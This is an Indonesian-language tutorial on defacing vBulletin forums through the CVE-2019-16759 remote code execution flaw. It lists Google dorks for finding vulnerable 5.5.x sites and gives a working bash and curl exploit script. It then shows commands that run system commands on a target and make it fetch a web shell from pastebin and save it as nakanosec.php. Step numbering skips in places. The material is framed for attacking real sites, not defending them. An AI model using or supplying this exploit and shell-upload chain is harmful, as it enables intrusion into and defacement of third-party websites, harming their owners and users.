Tutorial - Cara Deface VBulletin RCE Upload Shell - CVE-2019-16759
Keyword:Cara Deface vBulletin, vBulletin Auto exploit, Exploit Vbulletin, Tutorial Deface Vbulletin, CVE-2019-16759, Cara Hack Vbulletin Terbaru
Dork:
intext:"Powered by vBulletin"+"Version 5.5.4"
intext:"Powered by vBulletin"+"Version 5.5.1"
intext:"Powered by vBulletin"+"Version 5.5.3"
Cara Deface
1. Cari situs fresh pakek google dork
2. Copy Code Dibawah ini
#!/bin/bash
# vBulletin (widget_tabbedcontainer_tab_panel) 5.x 0day by @Zenofex
# Usage ./exploit
# Urlencode cmd
CMD=`echo $2|perl -MURI::Escape -ne 'chomp;print uri_escape($_),"\n"'`
# Send request
curl -s $1/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("'+$CMD+'");exit;'
4.Kemudian save dengan nama rce.sh kemudian
5.Jalankan toolsnya pada terminal / termux kalian
./rce.sh http://target.com/ "uname -a"
6.Jika situs yang kamu masukkan vuln maka akan muncul seperti ini
./rce.sh http://target.com/ "wget https://pastebin.com/raw/rEuinSyj -O nakanosec.php"8.Untuk melihat hasil upload bisa kalian lihat di
http://target.com/nakanosec.php atau http://target.com/forum/nakanosec.php